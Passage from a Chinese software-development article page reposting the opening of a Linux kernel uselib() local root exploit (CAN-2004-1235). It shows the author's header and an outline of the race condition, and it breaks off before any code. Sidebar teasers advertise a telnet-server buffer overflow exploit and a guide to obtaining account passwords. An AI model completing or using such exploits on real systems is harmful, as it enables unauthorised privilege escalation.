当前位置:首页 » 软件开发
开发技术指南» 文章正文
    引言: Linux Kernel 2.4.x / 2.6.x useli
 

 

 ·获取帐号密码的简单方法<转>    »显示摘要«
    摘要:注:本文旨在帮助广大网络爱好者学到更多有用的知识,进一步加强防范意识,希望不会给您带来错误的引导。谨记!我们有办法可以获得一些帐号,具体方法有很多,我们现在就介绍几种: 1、利用目标主机的finger功能注:本文旨在帮助广大网络爱好者学到更多有用的知识,进一步加强防范意识,希望不会给您带来错误的引导。谨记!我们有办法可以获得一些帐号,具体方法有很多,我们现在就介绍几种: 1、利用目标主机的fing......
 ·goodtech telnet server 5.x    »显示摘要«
    摘要:goodtech telnet server 5.x remote buffer overflow exploitdate : 16/03/2005 vulnerable - goodtech telnet server versions prior to 5.0.7 /* * * cybertronic[at]gmx[dot]net * * * [ cybertronic @ g......


linux uselib() Local Privilege Escalation Exploit
linux kernel 2.4.x / 2.6.x uselib() local privilege escalation exploitdate : 22/03/2005 can-2004-1235 : kernel 2.4.x <= 2.4.29-rc2 and 2.6.x <= 2.6.10 are vulnerable /* * pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. private. * its not the best one, the ldt approach is definitively better. * discovered may 2004. no longer private because lorian/cliph/ihaquer * can lick my balls. * (c) 2004 sd <sd@fucksheep.org> * requieres cca 1gb on fs. */

linux kernel 2.4.x / 2.6.x uselib() local privilege escalation exploitdate : 22/03/2005 can-2004-1235 : kernel 2.4.x <= 2.4.29-rc2 and 2.6.x <= 2.6.10 are vulnerable /* * pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. private. * its not the best one, the ldt approach is definitively better. * discovered may 2004. no longer private because lorian/cliph/ihaquer * can lick my balls. * (c) 2004 sd <sd@fucksheep.org> * requieres cca 1gb on fs. */ /* * first create fake vma structs. * * * lets have 3 threads, t1, t2 and t3. * t1 and t2 have common vm. * * t3: * - wait4sig (will come back from t2) * - write(fd3, bigmem, bigfile_size) * - exit() * t1: * - fd3 = empty file * - fd1 = bigfile, writing it took 16 secs * - bigmem = mmap(null, bigfile_size, fd1, 0); * - t3 = fork() * - t2 = clone() * - fd2 = munmap_file, size of ram. * - mumem = mmap(null, munmap_file_size, fd2) * - mmap(mumem, 4096, anonymous) // for extending do_brk check * - mmap lots of vmas * - close(fd2); * - create evil lib * - free lot of vmas * - sig @ t2 * - evil_lib->do_munmap(mumem + 4096, munmap_file_size - 4096); * - sem = 1 * - waitpid * t2: * - wait4sig * - sleep(100msec) * - mmap(mumem, fd3, 4096) // this is being protected by i_sem ! * - sendsig @ t3 * - sleep(100msec) * - if (sem) error * - msyn
...   下一页

    摘要:ssl协议与数字证书原理 网络版必读(2)ssl协议与数字证书原理 网络版必读(2)1楼 ssl 协议的握手和通讯   为了便于更好的认识和理解 ssl 协议,这里着重介绍 ssl 协议的握手协议。ssl 协议既用到了公钥加密技术又用到了对称加密技术,对称加密技术虽然比公钥加密技术的速度快,可是公钥加密技术提供了更好的身份认证技术。ssl 的握手协议非常有效的让客户和服......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE